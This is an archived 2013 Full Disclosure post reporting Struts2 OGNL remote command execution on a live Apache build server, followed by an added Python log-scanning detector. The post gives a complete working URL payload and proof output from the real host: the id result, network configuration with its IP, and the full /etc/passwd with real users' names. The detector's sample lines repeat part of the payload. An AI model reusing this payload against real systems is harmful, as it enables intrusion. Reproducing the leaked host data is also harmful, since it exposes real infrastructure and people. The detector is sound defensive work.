Full Disclosure mailing list archives
Apache Software Foundation A Subsite Remote command execution
From: you help <help.en () wooyun org>
Date: Sun, 13 Oct 2013 17:28:19 +0800
*Abstract:*
# Apache, Mind Yourself
Apache Struts2: a vulnerability introduced by manipulating parameters prefixed with "action:"/"redirect:"/"redirectAction:" allows remote command execution.

*Details:*
# show the webroot
http://vmbuild.apache.org/continuum/groupSummary.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'whoami'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matr%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23matt.getWriter().println(%23matr.getRealPath(%22/%22)),%23matt.getWriter().flush(),%23matt.getWriter().close()}

/home/continuum/apache-continuum-1.4.1/apps/continuum

*Proofs of concept:*
# id
uid=1001(continuum) gid=1001(continuum) groups=1001(continuum)

# /sbin/ifconfig
eth0      Link encap:Ethernet  HWaddr 00:50:56:ae:00:0b
          inet addr:140.211.11.54  Bcast:140.211.11.255  Mask:255.255.255.0
          inet6 addr: fe80::250:56ff:feae:b/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:22081926 errors:0 dropped:0 overruns:0 frame:0
          TX packets:7627912 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:26173286052 (26.1 GB)  TX bytes:3491916802 (3.4 GB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:42196069 errors:0 dropped:0 overruns:0 frame:0
          TX packets:42196069 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:24001777186 (24.0 GB)  TX bytes:24001777186 (24.0 GB)

# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
landscape:x:102:108::/var/lib/landscape:/bin/false
gmcdonald:x:1000:1000:gmcdonald,,,:/home/gmcdonald:/bin/bash
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
continuum:x:1001:1001::/home/continuum:/bin/sh
archiva:x:1002:1002::/home/archiva:/bin/sh
postfix:x:104:113::/var/spool/postfix:/bin/false
messagebus:x:105:115::/var/run/dbus:/bin/false
avahi:x:106:116:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
brett:x:1717:1717::/home/brett:/bin/bash
mysql:x:107:117:MySQL Server,,,:/var/lib/mysql:/bin/false
smmta:x:108:118:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:109:119:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
apbackup:x:1718:1718::/home/apbackup:/bin/sh
pctony:x:2097:2097::/home/pctony:/bin/bash
ntp:x:110:120::/home/ntp:/bin/false
evenisse:x:1003:1003:Emmanuel Venisse,,,:/home/evenisse:/bin/bash
puppet:x:111:121:Puppet configuration management daemon,,,:/var/lib/puppet:/bin/false
olamy:x:1004:1004:Olivier Lamy,,,:/home/olamy:/bin/bash
usbmux:x:112:46:usbmux daemon,,,:/home/usbmux:/bin/false
markt:x:1787:1787:medthomas:/home/markt:/bin/bash

--------------------------------------------------------------------------------------------------------------------------------
*Author*: 猪猪侠 <http://en.wooyun.org/whitehats/%E7%8C%AA%E7%8C%AA%E4%BE%A0>
*From:* http://en.wooyun.org/bugs/wooyun-2013-06?2605
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
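The vector in the post above is a parameter whose *name* starts with "action:", "redirect:" or "redirectAction:" and whose remainder is an OGNL expression; the whole payload sits in the parameter name (there is no "=" in the URL), with "=" and "#" inside it URL-encoded as %3d and %23. The following detector is an added example, not code from the post or from any Apache project: it parses request targets out of constructed access-log lines (the sample lines below are made up for illustration, including the double-encoded variant), splits the query on "&" and "=" before decoding so encoded delimiters inside the payload are not mis-split, and flags only prefixed parameters that carry OGNL markers, so an ordinary `redirect:/login.action` is left alone. The marker list is a heuristic, not a complete signature.

```python
"""
Detector for the Struts2 action:/redirect:/redirectAction: parameter-prefix
OGNL injection vector described in the advisory above, run over constructed
access-log lines. Added example; not code from the advisory or from Apache.
"""
import re
from urllib.parse import urlsplit, unquote

# Parameter-name prefixes that the vulnerable Struts2 DefaultActionMapper
# treated as navigation directives and evaluated as OGNL.
PREFIXES = ("redirectAction:", "redirect:", "action:")

# Markers of an OGNL expression, plus the classes/objects the advisory's
# payload reaches for (ProcessBuilder, the servlet response via #context).
# Heuristic, not exhaustive.
OGNL_MARKERS = re.compile(
    r"\$\{|%\{|#context|#_memberAccess|java\.lang\.ProcessBuilder"
    r"|java\.lang\.Runtime|getWriter\(\)",
    re.IGNORECASE,
)

# Request line inside a Common Log Format entry: "GET /target HTTP/1.1"
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def decode_fully(s, rounds=3):
    """URL-decode up to `rounds` times. The container decodes once; the extra
    rounds surface double-encoded evasion attempts for analyst review."""
    for _ in range(rounds):
        d = unquote(s)
        if d == s:
            break
        s = d
    return s


def inspect_target(target):
    """Inspect one request target (path?query). Returns a list of findings,
    each (prefix, decoded_expression). Splits on '&' and '=' BEFORE decoding,
    because the payload itself contains encoded '=' (%3d) that must not be
    treated as a name/value delimiter."""
    findings = []
    for pair in urlsplit(target).query.split("&"):
        if not pair:
            continue
        raw_name, _, raw_value = pair.partition("=")
        name = decode_fully(raw_name)
        prefix = next((p for p in PREFIXES if name.startswith(p)), None)
        if prefix is None:
            continue
        # In the advisory's URL the whole OGNL block is the parameter *name*,
        # so examine the remainder of the name together with any value.
        expr = name[len(prefix):] + decode_fully(raw_value)
        # redirect:/some/path.action is ordinary Struts usage; only an OGNL
        # expression after the prefix is suspicious.
        if OGNL_MARKERS.search(expr):
            findings.append((prefix, expr))
    return findings


def scan_log(lines):
    """Return [(client_ip, findings)] for every log line that carries a hit."""
    hits = []
    for line in lines:
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        findings = inspect_target(m.group(1))
        if findings:
            hits.append((line.split(" ", 1)[0], findings))
    return hits


# Constructed sample lines (Common Log Format); not real traffic. Line 1 is
# the advisory's own payload, truncated; line 2 is a double-encoded variant;
# lines 3 and 4 are benign.
SAMPLE_LOG = [
    '10.0.0.5 - - [13/Oct/2013:17:28:19 +0800] "GET /continuum/groupSummary.action'
    "?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]"
    "{'whoami'})).start(),%23b%3d%23a.getInputStream()} HTTP/1.1\" 302 0",
    '10.0.0.6 - - [13/Oct/2013:17:30:02 +0800] "GET /continuum/groupSummary.action'
    '?redirect%3A%2524%257B%2523a%253D1%257D HTTP/1.1" 302 0',
    '10.0.0.7 - - [13/Oct/2013:17:31:40 +0800] "GET /continuum/groupSummary.action'
    '?redirect:/continuum/login.action HTTP/1.1" 302 0',
    '10.0.0.8 - - [13/Oct/2013:17:32:11 +0800] "GET /continuum/groupSummary.action'
    '?projectGroupId=6 HTTP/1.1" 200 8120',
]

if __name__ == "__main__":
    for ip, findings in scan_log(SAMPLE_LOG):
        for prefix, expr in findings:
            print(f"{ip}: {prefix} OGNL -> {expr[:70]}")
```

Run against the samples it reports lines 1 and 2 only. Note the caveat built into the check: the prefixes themselves are legitimate Struts2 features, so alerting on the bare prefix would page on every normal redirect; the signal is the expression that follows it.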